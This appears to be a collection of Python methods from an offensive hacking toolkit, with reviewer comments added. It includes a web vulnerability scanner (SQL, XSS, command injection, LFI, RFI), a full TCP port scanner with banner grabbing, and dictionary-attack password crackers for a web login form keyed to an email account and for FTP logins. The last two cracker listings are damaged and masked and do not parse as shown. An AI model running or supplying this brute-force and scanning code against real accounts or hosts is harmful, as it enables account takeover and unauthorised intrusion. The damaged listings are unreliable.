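def scan(self):
    """Run the web checks in a fixed order and build a text report.

    Progress is printed to stdout and the report is accumulated in
    ``self.results``: the anonymous-FTP check first, then, only when the
    module-level ``vuln_links`` list is non-empty after
    ``self.grab_links()`` has run, the SQL, XSS, command-injection, LFI
    and RFI checks, each contributing whatever string its method returns.

    NOTE(review): the listing this was taken from had lost its
    indentation; the nesting below is the most plausible reading and
    should be confirmed against the original file.
    """
    global br, vuln_links

    print("\n[+] Target: " + self.target)
    if self.verbose == 1:
        print("[!] Checking proxy...")
    if self.proxy != "":
        hst, prt = parse_address(self.proxy)
        pr = proxy(hst, prt, self.proxy_type)
        if pr.set_browser_proxy() == True:
            print("[+] Proxy: " + self.proxy)
        else:
            print("[-] Invalid or dead proxy")
    else:
        print("[-] Proxy not set")

    print("\n[*] Checking anonymous FTP login...")
    self.results = "Anonymous FTP login:\n"
    self.results += self.FTPScan()

    print("[*] Checking vulnerables links...\n")
    self.grab_links()
    if not vuln_links:
        self.results += "\nNo vulnerable links found"
        print("[-] No vulnerable links found\n")
        return

    # NOTE(review): the rest of this method reads self.verbose; verbose_mode
    # may be a typo for it. Confirm against the class before changing.
    if self.verbose_mode == 1:
        print("[!] " + str(len(vuln_links)) + " vulnerable links found")

    # (name in the progress line, name in the report heading, check to run)
    checks = (
        ("SQL", "SQL", self.SQLScan),
        ("XSS", "XSS", self.XSSScan),
        ("command injection", "Command injection", self.CMDScan),
        ("LFI", "LFI", self.LFIScan),
        ("RFI", "RFI", self.RFIScan),
    )
    for progress_name, report_name, run_check in checks:
        # The LFI progress line originally ended in a literal "n" (a lost
        # backslash); all five lines now end in a real newline.
        print("[*] Checking " + progress_name + " vulnerability...\n")
        self.results += "\n" + report_name + " vulnerability:\n"
        self.results += run_check()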
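def scan(self):
    """Try a TCP connection to every port of ``self.target`` and record the open ones.

    For each port where ``pr.connect`` returns True, an HTTP ``HEAD``
    request is sent, up to 1024 bytes of reply are read as a banner, and a
    "PORT/tcp open SERVICE" line (followed by the banner when it is
    non-empty) is printed and appended to ``self.results``.  When nothing
    was appended, ``self.results`` is set to "No open ports found".

    Seen from the target, a run is a series of connection attempts in
    ascending port order, each successful one followed by the same
    ``HEAD / HTTP/1.0`` request.

    NOTE(review): the listing this was taken from had lost its
    indentation; the nesting below is the most plausible reading.
    Presumably ``self.results`` starts as "" (set outside this method).
    """
    print("\n[+] Target: " + self.target)
    if self.verbose == 1:
        print("[!] Checking proxy...")
    if self.proxy != "":
        hst, prt = parse_address(self.proxy)
        pr = proxy(hst, prt, self.proxy_type)
        if pr.set_socket_proxy() == True:
            print("[+] Proxy: " + self.proxy)
        else:
            print("[-] Invalid or dead proxy")
    else:
        print("[-] Proxy not set")
        pr = proxy("", "", "")
        pr.set_no_proxy()
    print("")
    if self.verbose == 1:
        print("[!] Scanning target...\n")

    # Valid TCP ports are 1..65535; range(65535) tried port 0 and never
    # reached port 65535.
    for port in range(1, 65536):
        try:
            if pr.connect(self.target, port) == True:
                pr.send("HEAD / HTTP/1.0\r\n\r\n")
                banner = pr.recv(1024)
                # Resolve the service name once and reuse it for both outputs.
                entry = "%s/tcp open %s" % (port, self.porttoservice(port))
                self.results += entry + "\n"
                print("[+] " + entry)
                if banner != "":
                    print(banner)
                    self.results += banner + "\n"
        except Exception:
            # Best effort: a port that fails to connect or answer is skipped.
            # Exception (not a bare except) so Ctrl-C still stops the run.
            pass

    if self.results == "":
        self.results = "No open ports found"
        print("[-] Failed to connect to target")
        print("[-] " + self.results + "\n")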
def crack(self):
    """Submit each wordlist line as the password for ``self.target`` on ``self.login_page``.

    Form 0 of the page is filled with ``self.target`` in the ``email``
    field and the candidate in the ``pass`` field, once per line of
    ``self.wordslist``.  The first submission whose resulting URL does not
    contain "login_attempt" is stored in ``self.results`` and ends the
    loop; success is inferred from that URL test alone.

    Seen from the server, a run is one form submission per wordlist line
    against a single account, in file order.

    NOTE(review): the listing this was taken from had lost its
    indentation; the nesting below is the most plausible reading.
    NOTE(review): the bare ``except`` also catches KeyboardInterrupt, and
    every error, including an unreadable wordlist, is reported as a
    connection failure.
    """
    print("\n[+] Target: " + self.target)
    if self.verbose == 1:
        print("[!] Checking proxy...")
    if self.proxy == "":
        print("[-] Proxy not set")
    else:
        host, port = parse_address(self.proxy)
        pr = proxy(host, port, self.proxy_type)
        proxy_ok = pr.set_browser_proxy() == True
        if proxy_ok:
            print("[+] Proxy: " + self.proxy)
        else:
            print("[-] Invalid or dead proxy")
    print("")
    if self.verbose == 1:
        print("[!] Connecting to target...\n")

    br = browser()
    try:
        br.open(self.login_page)
        if self.verbose == 1:
            print("[!] Checking wordslists...")
        candidates = open(self.wordslist, "r").readlines()
        if self.verbose == 1:
            print("[!] Attack started...\n")
        for line in candidates:
            candidate = line.replace("\n", "")
            print("[*] Trying: " + candidate)
            br.select_form(nr=0)
            br.form['email'] = self.target
            br.form['pass'] = candidate
            resp = br.submit()
            if "login_attempt" in resp.geturl():
                continue
            self.results = "Password is " + candidate
            print("[+] " + self.results)
            break
    except:
        self.results = "Failed to crack password"
        print("[-] Failed to connect to target")
        print("[-] " + self.results + "\n")
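def grab_links(self):
    """Fetch ``self.target`` and print the ``href`` of every anchor element.

    The page is parsed with BeautifulSoup (``lxml`` parser).  Links are
    only printed, not stored; an anchor without an ``href`` prints as
    ``None``.  ``self.results`` is written only on failure.

    NOTE(review): the listing this was taken from had lost its
    indentation; the nesting below is the most plausible reading.
    """
    print("\n[+] Target: " + self.target)
    if self.verbose == 1:
        print("[!] Checking proxy...")
    if self.proxy != "":
        hst, prt = parse_address(self.proxy)
        pr = proxy(hst, prt, self.proxy_type)
        if pr.set_browser_proxy() == True:
            print("[+] Proxy: " + self.proxy)
        else:
            print("[-] Invalid or dead proxy")
    else:
        print("[-] Proxy not set")
    print("")
    if self.verbose == 1:
        print("[!] Connecting to target...")

    br = browser()
    try:
        site = br.open(self.target)
        src = site.read()
        soup = BeautifulSoup(src, "lxml")
        links = soup.find_all('a')
        if self.verbose == 1:
            print("[!] Found %d links\n" % len(links))
        for link in links:
            print(link.get("href"))
    except Exception:
        # Exception rather than a bare except, so Ctrl-C still interrupts.
        # Any fetch or parse error lands here and is reported as a
        # connection failure.
        self.results = "No results found"
        print("[-] Failed to connect to target")
        print("[-] " + self.results + "\n")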
# crack: dictionary attack against the login form on self.login_page.
# Both self.userslist and self.wordslist are read before the branch on
# self.username.  With a username set, form 0 is filled (fields named by
# self.user_form / self.pass_form) and submitted once per wordlist line; the
# other branch iterates the username list as well.  The first attempt whose
# response URL passes the "login"/"attempt" test is written to self.results.
# Seen from the server, a run is one form submission per candidate against
# the same login page, in file order.
# NOTE(review): this listing is damaged. Indentation is gone and the two
# "******" runs stand where source text appears to have been masked out, so
# the nested username/password loop is incomplete and the line does not parse
# as shown. The code is left untouched rather than guessed at.
# NOTE(review): the bare except reports every error, including an unreadable
# list file, as "Failed to crack password".
def crack(self): print "\n[+] Target: " + self.target if self.verbose == 1: print "[!] Checking proxy..." if self.proxy != "": hst, prt = parse_address(self.proxy) pr = proxy(hst, prt, self.proxy_type) if pr.set_browser_proxy() == True: print "[+] Proxy: " + self.proxy else: print "[-] Invalid or dead proxy" else: print "[-] Proxy not set" print if self.verbose == 1: print "[!] Connecting to target..." br = browser() try: br.open(self.login_page) if self.verbose == 1: print "[!] Checking wordslists..." usernames = open(self.userslist, "r").readlines() passwords = open(self.wordslist, "r").readlines() if self.username != "": for word in passwords: password = word.replace("\n", "") print "[*] Trying: " + password br.select_form(nr=0) br.form[self.user_form] = self.username br.form[self.pass_form] = password resp = br.submit() if ("login" not in resp.geturl()) or ("attempt" not in resp.geturl()): self.results = "Password is " + password print "[+] " + self.results break else: for user in usernames: username = user.replace("\n", "") print "[*] Trying username: "******"\n", "") print "[*] Trying password: "******"login" not in resp.geturl()) or ( "attempt" not in resp.geturl()): self.results = "Login is %s:%s" % (username, password) print "[+] " + self.results break except: self.results = "Failed to crack password" print "[-] " + self.results
# crack: dictionary attack against an FTP login at self.target:self.port.
# The connection is made through pr (a socket proxy when self.proxy is set,
# otherwise proxy("", "", "") with set_no_proxy()).  After one pr.connect per
# branch, each candidate is sent as a USER line followed by a PASS line, and
# a reply containing "230" is treated as a successful login and written to
# self.results.  With self.username empty the username list is iterated as
# well; otherwise only the password list is.
# Seen from the server, a run is a sequence of USER/PASS exchanges, one per
# candidate, in file order.
# NOTE(review): this listing is damaged. Indentation is gone and the
# "******" runs stand where source text appears to have been masked out (the
# username banner and the nested loop of the first branch), so the line does
# not parse as shown. The code is left untouched rather than guessed at.
# NOTE(review): each bare except reports every error, including an
# unreadable list file, as "Failed to crack password".
def crack(self): print "\n[+] Target: " + self.target if self.username != "": print "[+] Username: "******"[!] Checking proxy..." if self.proxy != "": hst, prt = parse_address(self.proxy) pr = proxy(hst, prt, self.proxy_type) if pr.set_socket_proxy() == True: print "[+] Proxy: " + self.proxy else: print "[-] Invalid or dead proxy" else: print "[-] Proxy not set" pr = proxy("", "", "") pr.set_no_proxy() print if self.username == "": try: if pr.connect(self.target, self.port) == True: if self.verbose == 1: print "[!] Checking wordslists..." usernames = open(self.userslist, "r").readlines() passwords = open(self.wordslist, "r").readlines() for user in usernames: username = user.replace("\n", "") print "[*] Trying username: "******"\n", "") print "[*] Trying password: "******"USER " + username + "\r\n") pr.recv(1024) pr.send("PASS " + password + "\r\n") r = pr.recv(1024) if "230" in r: self.results = "Login is %s:%s" % (username, password) print "[+] " + self.results break except: self.results = "Failed to crack password" print "[-] " + self.results else: try: if pr.connect(self.target, self.port) == True: if self.verbose == 1: print "[!] Checking wordslists..." passwords = open(self.wordslist, "r").readlines() for word in passwords: password = word.replace("\n", "") print "[*] Trying: " + password pr.send("USER " + self.username + "\r\n") pr.recv(1024) pr.send("PASS " + password + "\r\n") r = pr.recv(1024) if "230" in r: self.results = "Password is " + password print "[+] " + self.results break except: self.results = "Failed to crack password" print "[-] " + self.results